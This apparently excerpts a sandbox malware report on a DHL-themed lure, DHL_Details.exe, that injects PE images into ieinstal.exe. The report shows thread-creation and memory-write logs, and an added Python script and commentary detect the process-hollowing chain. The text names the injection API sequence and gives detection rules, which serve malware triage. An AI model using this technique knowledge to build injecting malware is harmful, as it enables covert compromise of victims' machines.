Source: C:\Users\user\Desktop\DHL_Details.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 3190000
Source: C:\Users\user\Desktop\DHL_Details.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 31D0000
Source: C:\Users\user\Desktop\DHL_Details.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 31F0000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2570000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2830000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2870000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2890000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2A10000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2AD0000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2B10000
Source: C:\Users\user\Xgku\Xgkuees.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 2B30000
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5A
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5A
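Read together, the signature blocks above describe one chain: RWX regions are allocated inside ieinstal.exe, a buffer beginning with 4D5A (the "MZ" DOS header) is written into one of them, and threads are started at bases that were allocated and written moments earlier. That is the behavioural side of the API sequence flagged under "Contains functionality to inject code into remote processes" (CreateProcessW, GetThreadContext, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread), which is the usual RunPE / process-hollowing shape. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses lines of the form shown in this report, joins them per writer/target pair, and escalates only when an MZ-headed write and a thread on a previously allocated RWX region hit the same target. The sample lines are constructed from the entries above (same paths and bases, plus one benign line that must not trigger); the line regex, the Event/finding structures, the rule names and the verdict strings are this example's own assumptions, not Joe Sandbox's.

```python
"""Correlate sandbox behaviour events into a remote PE-injection chain.

Added example, not part of the Joe Sandbox report and not Joe Sandbox code.
It assumes lines of the shape seen in the report:
  Source: <writer> <Event>: <target> base|EIP: <hex> [protect: ...] [value starts with: <hex>]
The regex, the Event/finding structures and the rule names are this example's own.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample mirroring the report's entries (same paths and bases),
# plus one benign explorer.exe line that must not produce a finding.
SAMPLE_EVENTS = r"""
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 value starts with: 4D5A
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000
Source: C:\Users\user\Desktop\DHL_Details.exe Thread created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe EIP: 30D0000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\explorer.exe base: 5A0000 protect: page read and write
"""

RWX = "page execute and read and write"
MZ = "4D5A"  # 'MZ', the DOS header magic that begins every PE image

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<kind>Memory allocated|Memory written|Thread created): (?P<dst>.+?) "
    r"(?:base|EIP): (?P<addr>[0-9A-Fa-f]+)"
    r"(?: protect: (?P<protect>.+?))?"
    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"
)


class Event(NamedTuple):
    src: str
    kind: str
    dst: str
    addr: int
    protect: Optional[str]
    magic: Optional[str]


def parse_events(text: str) -> List[Event]:
    """Parse behaviour lines; headings and truncated lines simply do not match."""
    events: List[Event] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            events.append(Event(m["src"], m["kind"], m["dst"],
                                int(m["addr"], 16), m["protect"], m["magic"]))
    return events


def correlate(events: List[Event]) -> List[dict]:
    """Group events per (writer, target) pair and emit injection findings."""
    pairs: Dict[Tuple[str, str], dict] = defaultdict(
        lambda: {"alloc": {}, "write": {}, "thread": []})
    for e in events:
        slot = pairs[(e.src, e.dst)]
        if e.kind == "Memory allocated":
            slot["alloc"][e.addr] = e.protect
        elif e.kind == "Memory written":
            # The report lists the same write under two signatures, once with
            # the magic and once without; never let the bare one mask the other.
            if e.magic or e.addr not in slot["write"]:
                slot["write"][e.addr] = e.magic
        else:
            slot["thread"].append(e.addr)

    findings: List[dict] = []
    for (src, dst), s in pairs.items():
        foreign = src != dst
        for addr, magic in s["write"].items():
            if magic == MZ:
                findings.append({"kind": "pe_image_written" if foreign else "self_pe_overwrite",
                                 "src": src, "dst": dst, "addr": addr})
        for addr in s["thread"]:
            # Allocate RWX, write into it, then start a thread at that base:
            # the injected code is being executed, not merely staged.
            if foreign and addr in s["write"] and s["alloc"].get(addr) == RWX:
                findings.append({"kind": "thread_on_injected_rwx",
                                 "src": src, "dst": dst, "addr": addr})
    return findings


def verdict(findings: List[dict]) -> str:
    """Escalate only when a PE image and an executing thread hit the same target."""
    with_pe = {(f["src"], f["dst"]) for f in findings if f["kind"] == "pe_image_written"}
    with_thread = {(f["src"], f["dst"]) for f in findings if f["kind"] == "thread_on_injected_rwx"}
    if with_pe & with_thread:
        return "remote PE injection chain"
    if findings:
        return "injection primitives observed"
    return "no injection chain"


if __name__ == "__main__":
    found = correlate(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f['kind']:24} {f['src']} -> {f['dst']} @ {f['addr']:#x}")
    print(verdict(found))
```

The rule keys on the (writer, target) pair rather than on single events, which is the check a triage analyst actually wants: a foreign RWX allocation on its own is noisy (installers, debuggers and some security products do it), but the same writer also dropping an MZ header into the target and then starting a thread in a region it allocated and wrote is the injection shape, whoever the target is. The 4D5A write from ieinstal.exe into ieinstal.exe at 400000 is kept as a separate self_pe_overwrite finding and deliberately not folded into the verdict, because this section does not show which ieinstal.exe instance is writing into which; resolving that needs the PIDs from the process tree.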
Writes to foreign memory regions
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3160000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3170000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3180000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3190000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31A0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31B0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31C0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31D0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31E0000
Source: C:\Users\user\Desktop\DHL_Details.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31F0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2570000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2800000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2810000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2820000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2830000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2840000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2850000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2860000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2870000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2880000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2890000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A10000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AA0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AB0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AC0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AD0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AE0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AF0000
Source: C:\Users\user\Xgku\Xgkuees.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2B00000
Source: C:\Users\user\Xgku\Xgkuees.exe